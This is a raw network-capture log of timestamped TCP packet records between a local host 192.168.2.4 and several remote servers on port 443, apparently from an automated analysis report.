                                                        Nov 28, 2024 13:35:29.467729092 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.764832020 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.764875889 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.764952898 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.765153885 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.765167952 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.765177011 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.765182018 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.766097069 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.768690109 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.768853903 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.769320965 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.769340992 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.769351006 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.769356966 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.771759987 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.771786928 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.772265911 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.772418022 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.772432089 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.772906065 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.772931099 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.772995949 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.773144007 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.773153067 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.030985117 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.031002998 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.031076908 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.031100988 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.031255007 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.031297922 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.031303883 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.031327963 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.031481981 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.031512976 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.032865047 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.035190105 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.035237074 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.035325050 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.035480022 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.035491943 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040096045 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040100098 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040116072 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040121078 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040174007 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040189981 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040213108 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040230036 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040318966 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040350914 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040363073 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040370941 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040391922 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040400028 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040411949 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.040508032 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040537119 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040582895 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.040616989 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.041439056 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.041444063 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.042715073 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.042737961 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.042817116 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.042838097 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.042850018 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.042959929 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.042975903 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:30.042992115 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.043124914 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:30.043133974 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.629570007 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.630888939 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.630904913 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.631354094 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.631359100 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.653424025 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.654434919 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.654495955 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.655209064 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.655219078 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.770323992 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.773474932 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.773511887 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.773915052 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.773920059 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.826782942 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.827338934 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.827347994 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:31.827780008 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:31.827784061 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.082870007 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.082928896 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.083947897 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.085601091 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.085614920 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.085625887 CET49852443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.085630894 CET4434985213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.088272095 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.088323116 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.088403940 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.088526011 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.088537931 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.108391047 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.108449936 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.108541965 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.108633995 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.108649015 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.108659983 CET49851443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.108664989 CET4434985113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.112457037 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.112476110 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.115236998 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.115375996 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.115386963 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.205492020 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.205600977 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.209613085 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.210237980 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.210258961 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.210268021 CET49855443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.210273981 CET4434985513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.213452101 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.213463068 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.213582039 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.213736057 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.213747978 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.278604984 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.278677940 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.278723001 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.278896093 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.278911114 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.278923035 CET49853443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.278928041 CET4434985313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.281378031 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.281418085 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.281507015 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.281649113 CET49860443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.281658888 CET4434986013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.910864115 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.912369013 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.912405968 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.912803888 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:32.912811041 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:32.993387938 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:32.993518114 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:32.993650913 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:32.993845940 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:32.993882895 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:33.521580935 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:33.521604061 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:33.522339106 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:33.522614002 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:33.522628069 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:33.867650032 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:33.910629034 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:33.915972948 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:33.916048050 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:33.917994976 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:33.961725950 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:33.998063087 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:33.998084068 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:33.998508930 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:33.998513937 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.011174917 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.065320969 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.116554976 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.119038105 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.119048119 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.119057894 CET49854443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.119064093 CET4434985413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.120171070 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.120174885 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.120712042 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.120716095 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.121680021 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.121684074 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.122100115 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.122104883 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.124042034 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.124070883 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.124144077 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.124263048 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.124273062 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.323559046 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.323616982 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.323709965 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.323807955 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.323831081 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.323842049 CET49856443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.323847055 CET4434985613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.326520920 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.326558113 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.326623917 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.326781988 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.326790094 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.455600023 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.455651045 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.457880020 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.458730936 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.458741903 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.458751917 CET49857443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.458756924 CET4434985713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.461337090 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.461369038 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.461462021 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.461647987 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.461659908 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.519793034 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.519884109 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.521079063 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.523705006 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.523710966 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.523719072 CET49859443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.523721933 CET4434985913.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.526479006 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.526511908 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.530930996 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.531064034 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:34.531075954 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:34.684716940 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:34.694329977 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:34.694395065 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:34.694778919 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:34.695235014 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:34.695307970 CET44349861142.250.181.68192.168.2.4
                                                        Nov 28, 2024 13:35:34.740427971 CET49861443192.168.2.4142.250.181.68
                                                        Nov 28, 2024 13:35:34.780267000 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:34.787447929 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:34.787466049 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:34.787781000 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:34.791455984 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:34.791512012 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:34.791815042 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:34.832165956 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:34.832179070 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:35.253530979 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:35.253652096 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:35.253978014 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:35.254195929 CET49862443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:35.254211903 CET4434986235.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:35.904989958 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:35.905508041 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:35.905528069 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:35.906004906 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:35.906011105 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.107845068 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.108458996 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.108484030 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.108797073 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.108802080 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.178466082 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.179352999 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.179382086 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.179949999 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.179955006 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.250860929 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.257756948 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.257778883 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.258196115 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.258203983 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.289721966 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:36.289787054 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:36.290210962 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:36.290442944 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:36.290462017 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:36.349545002 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.349637985 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.349956989 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.352519035 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.352519035 CET49863443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.352534056 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.352541924 CET4434986313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.354950905 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.354990959 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.355207920 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.355405092 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.355421066 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.552966118 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.553011894 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.559330940 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.571398973 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.614130974 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.614176989 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.621474981 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.686218977 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.686284065 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.696305990 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.772620916 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.772654057 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.772742033 CET49864443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.772751093 CET4434986413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.773968935 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.773988962 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.774000883 CET49865443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.774007082 CET4434986513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.774857044 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.774867058 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.774878025 CET49866443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.774883032 CET4434986613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.777940035 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.777975082 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.777993917 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778012991 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.778059959 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778105974 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778302908 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778318882 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.778474092 CET49872443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778489113 CET4434987213.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.778599977 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778635979 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:36.778695107 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778861046 CET49873443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:36.778894901 CET4434987313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:37.594223976 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:37.598743916 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:37.598769903 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:37.599128962 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:37.599620104 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:37.599675894 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:37.599800110 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:37.647331953 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:38.077485085 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:38.077564001 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:38.077714920 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:38.077753067 CET4434986935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:38.078118086 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:38.078140974 CET49869443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:38.135716915 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.136257887 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.136296988 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.136733055 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.136740923 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.560204983 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.560687065 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.560714006 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.561120033 CET49871443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.561125040 CET4434987113.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.579799891 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.579879045 CET4434987013.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:38.582165003 CET49870443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:38.582361937 CET49870443192.168.2.413.107.246.63
